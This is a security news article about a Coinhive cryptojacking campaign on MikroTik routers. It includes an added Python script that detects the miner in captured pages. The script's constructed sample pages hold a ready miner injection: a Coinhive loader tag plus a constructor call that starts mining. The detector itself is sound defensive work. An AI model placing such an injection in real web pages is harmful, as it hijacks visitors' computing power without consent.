
CoinHive Miner Virus Outbreak Has Infected 170,000 Routers

The Coinhive miner virus has infected hundreds of thousands of MikroTik routers. The malware has reportedly installed a JavaScript miner on over 170,000 devices, and the outbreak is believed to be growing.

The first hint of the attacks came from a researcher who goes by the nickname MalwareHunterBR, who tweeted that the miner had started to spread at an alarming rate. News has also broken that the first stages of the attack alone compromised about 70 thousand routers.




What is Behind Coinhive’s Infection Success

It is believed that the hacker used one of the exploits for MikroTik devices to perform a zero-day type of attack through one device and then dropped a copy of the Coinhive library on that device. The library is also included in all of the pages displayed by the router, making all of the devices connected to it vulnerable.

Furthermore, since only one Coinhive key has been used for all of the Coinhive injections performed over the past week, it is believed that only one attacker is behind the attack.

In addition, researchers claim that non-MikroTik users were also among the victims. Some Internet service providers use MikroTik devices in their main network, and because the hacker injected the JavaScript code there, the attack has spread to all of the devices that are logically connected to the compromised MikroTik routers.

The injection has been tremendously successful because of how the attack is carried out: the infection process succeeded in gaining control of both incoming and outgoing traffic.
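An added example, not from the original article or the researchers it cites: a Python triage over captured page bodies that flags the Coinhive loader and groups hosts by the site key passed to the miner constructor, which is the kind of grouping behind the single-key observation above. The `coinhive.min.js` file name and the `CoinHive.Anonymous` / `CoinHive.User` constructors follow Coinhive's public JavaScript API; the sample pages, addresses and keys are constructed.

```python
import re
from collections import defaultdict

# Reference to the Coinhive loader script in a served page.
LIB_RE = re.compile(r"<script[^>]+src=[\"'][^\"']*coinhive(?:\.min)?\.js", re.I)
# Miner constructor whose first argument is the site key.
KEY_RE = re.compile(r"CoinHive\.(?:Anonymous|User)\(\s*[\"']([A-Za-z0-9]+)[\"']")

def scan_page(html):
    """Return (loader_present, site_keys) for one HTTP response body."""
    return bool(LIB_RE.search(html)), set(KEY_RE.findall(html))

def triage(pages):
    """Sort hosts into: keyed injections, loader without a readable key, clean."""
    by_key, loader_only, clean = defaultdict(list), [], []
    for host in sorted(pages):
        loader, keys = scan_page(pages[host])
        for key in sorted(keys):
            by_key[key].append(host)
        if loader and not keys:
            loader_only.append(host)   # key hidden or obfuscated: review by hand
        elif not loader and not keys:
            clean.append(host)
    return dict(by_key), loader_only, clean

# Constructed sample bodies keyed by documentation-range addresses; keys are made up.
INJECTED = ('<html><script src="https://coinhive.com/lib/coinhive.min.js"></script>'
            "<script>var m = new CoinHive.Anonymous('{key}'); m.start();</script></html>")
SAMPLE_PAGES = {
    "192.0.2.10": INJECTED.format(key="CONSTRUCTEDKEY0001"),
    "192.0.2.11": INJECTED.format(key="CONSTRUCTEDKEY0001"),
    "198.51.100.7": INJECTED.format(key="CONSTRUCTEDKEY0002"),
    "198.51.100.8": '<script src="/js/coinhive.min.js"></script><script>eval(x)</script>',
    "203.0.113.5": "<html><body>Router login</body></html>",
}

if __name__ == "__main__":
    by_key, loader_only, clean = triage(SAMPLE_PAGES)
    for key, hosts in by_key.items():
        print(f"{key}: {len(hosts)} host(s) {hosts}")
    print("loader without key:", loader_only)
    print("clean:", clean)
```

A single key across many hosts is consistent with one operator; hosts that carry the loader but no readable key need manual inspection rather than being counted as clean.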

For more information and removal of the Coinhive miner, you should visit the related article underneath:

Related: How to Remove Coinhive Monero Miner Trojan from Your PC




The Attack Has Now Spread on a Global Scale and Will Likely Continue Increasing

Since the miner virus has been used to gain control of an insane amount of traffic in a short timeframe, a lot of users and ISPs are likely to fight back, and researchers believe that the hacker behind this version of the Coinhive miner knows that.

According to Trustwave researchers, ISPs and users who are currently using MikroTik routers should be on alert, as the threat has now been detected in other countries as well. With this much traffic being hijacked directly from the routers instead of from end devices, it is definitely a good idea to take measures, as this issue affects hundreds of users on a daily basis.

The CoinHive Miner Focused on Monero

The original Coinhive miner malware was initially used as JavaScript embedded in a Trojan, which used scripts to mine the cryptocurrency Monero by overloading the system resources of the computers it infected. It quickly grew to be one of the biggest threats out there by gaining massive access to users through people who placed it on different websites all across the world. The miner has also been detected on many famous torrent websites, such as Kickass Torrents and The Pirate Bay. But this is not all: the Coinhive miner has also been reported to be installed by Trojans and incorporated directly into the web browsers of victims. All of these ideas, turned into reality by cyber-criminals, have resulted in a massive rise in cryptocurrency miners, with the Coinhive miner leading among the JavaScript miner viruses.

Ventsislav Krastev

Ventsislav has been a cybersecurity expert at SensorsTechForum since 2015. He has been researching, covering, and helping victims with the latest malware infections, as well as testing and reviewing software and the newest tech developments. Having also graduated in Marketing, Ventsislav has a passion for learning new shifts and innovations in cybersecurity that become game changers. After studying Value Chain Management, Network Administration and Computer Administration of System Applications, he found his true calling within the cybersecurity industry and is a strong believer in the education of every user towards online safety and security.
